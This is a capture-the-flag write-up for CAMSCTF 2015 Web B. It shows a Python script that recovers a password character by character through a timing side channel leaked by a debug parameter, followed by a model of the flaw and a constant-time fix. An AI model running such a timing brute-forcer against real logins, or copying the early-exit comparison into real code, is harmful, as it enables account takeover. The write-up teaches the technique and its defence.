
Saturday, 25 April 2015

CAMSCTF CCTF 2015: Web B (Exploitation) Write-up


Description:
"Time is what we want most, but what we use worst." - William Penn
Solution:

          Target: http://web.camsctf.com/b/



          Intercept the HTTP request with Burp Suite.


          debug=0? Try changing debug to 1.


          Base64-decode the reply to get a start time and an end time.


          "Time": when I saw this word, I thought it must be about a side-channel attack, and my solution is below.

#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
# Python 2 script (urllib2, print statement).
import urllib, urllib2, string, re, sys

def minus(num):
    # num is [start, end] from the decoded reply; returns start - end
    return float(num[0]) - float(num[1])

url_check = 'http://web.camsctf.com/b/check.php'

# Append each printable character to the known prefix (argv[1]) and print the reported timing
for i in list(string.printable):
    password = sys.argv[1]+i
    post_data = urllib.urlencode({'password' : password, 'debug' : '1'})
    req = urllib2.Request(url_check, post_data)
    resp = urllib2.urlopen(req).read()
    # With debug=1 the "reply" field holds base64("start-end")
    b64 = re.search("\"reply\":\"(.*)\"",resp).group(1)
    print "Password {0} : {1}".format(password,b64)
    num = b64.decode('base64').split("-")
    result = minus(num)
    print "Password {0} : {1}".format(password,result)
'''
root@ubuntu:~# python web300.py "" # see the different amounts of time to process.
...[snip]...
root@ubuntu:~# python web300.py "u"
...[snip]...
root@ubuntu:~# python web300.py "uH"
...[snip]...
root@ubuntu:~# python web300.py "uHH"
...[snip]...
root@ubuntu:~# python web300.py "uHH>n"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)["
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[K"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v:"
...[snip]...
Password uHH>nN#)[Ks5v:A : MTQyOTY3MzA5OS4zMTk2LTE0Mjk2NzMwOTkuNjAwNg==
Password uHH>nN#)[Ks5v:A : -0.280999898911
Password uHH>nN#)[Ks5v:B : MTQyOTY3MzA5OS45NjI2LTE0Mjk2NzMxMDAuMjQzNw==
Password uHH>nN#)[Ks5v:B : -0.281100034714
Password uHH>nN#)[Ks5v:C : MTQyOTY3MzEwMC41NjUtMTQyOTY3MzEwMC44NDU1
Password uHH>nN#)[Ks5v:C : -0.28049993515
Password uHH>nN#)[Ks5v:D : MTQyOTY3MzEwMS4xOTU5LTE0Mjk2NzMxMDEuNDgxMw==
Password uHH>nN#)[Ks5v:D : -0.285400152206
Password uHH>nN#)[Ks5v:E : Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
'''
          Send password=uHH>nN#)[Ks5v:E&debug=1 to get the flag. :D

Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
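
The class of flaw this write-up relies on, modelled beside a hardened check, as an added example (Python 3; not code from the challenge or from the author). The challenge's real check.php is not shown on the page, so the early-exit comparison, the secret, the per-character cost and the simulated clock are all constructed assumptions.

```python
import base64
import hashlib
import hmac

SECRET = "demo-Secret"      # constructed value, not the challenge password
TICKS_PER_CHAR = 20         # assumed cost (ms) of examining one character
clock = {"now": 1_000_000}  # simulated clock in ms keeps the demo deterministic

def leaky_equal(guess, secret):
    """Early-exit compare: work grows with the length of the correct prefix."""
    examined = 0
    for g, s in zip(guess, secret):
        examined += 1
        if g != s:
            return False, examined
    return len(guess) == len(secret), examined

def fixed_equal(guess, secret):
    """Compare fixed-length digests in constant time; work is always the same."""
    a = hashlib.sha256(guess.encode()).digest()
    b = hashlib.sha256(secret.encode()).digest()
    return hmac.compare_digest(a, b), len(b)

def vulnerable_check(password, debug):
    """Models the flaw: early exit plus start/end times echoed when debug=1."""
    start = clock["now"]
    ok, examined = leaky_equal(password, SECRET)
    clock["now"] += examined * TICKS_PER_CHAR
    if ok:
        return "ok"
    if debug == "1":
        return base64.b64encode(f"{start}-{clock['now']}".encode()).decode()
    return "wrong"

def hardened_check(password, debug):
    """Fixed-work compare; the client-supplied debug flag is ignored."""
    ok, work = fixed_equal(password, SECRET)
    clock["now"] += work * TICKS_PER_CHAR
    return "ok" if ok else "wrong"

def reported_ms(reply):
    """Elapsed time a client can read from a reply, or None if none is exposed."""
    try:
        start, end = base64.b64decode(reply, validate=True).decode().split("-")
        return int(end) - int(start)
    except ValueError:
        return None
```

In the vulnerable handler a wrong guess with four correct leading characters reports 100 ms against 20 ms for a guess that is wrong from the first character; the hardened handler returns the same reply for both and exposes no timing.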
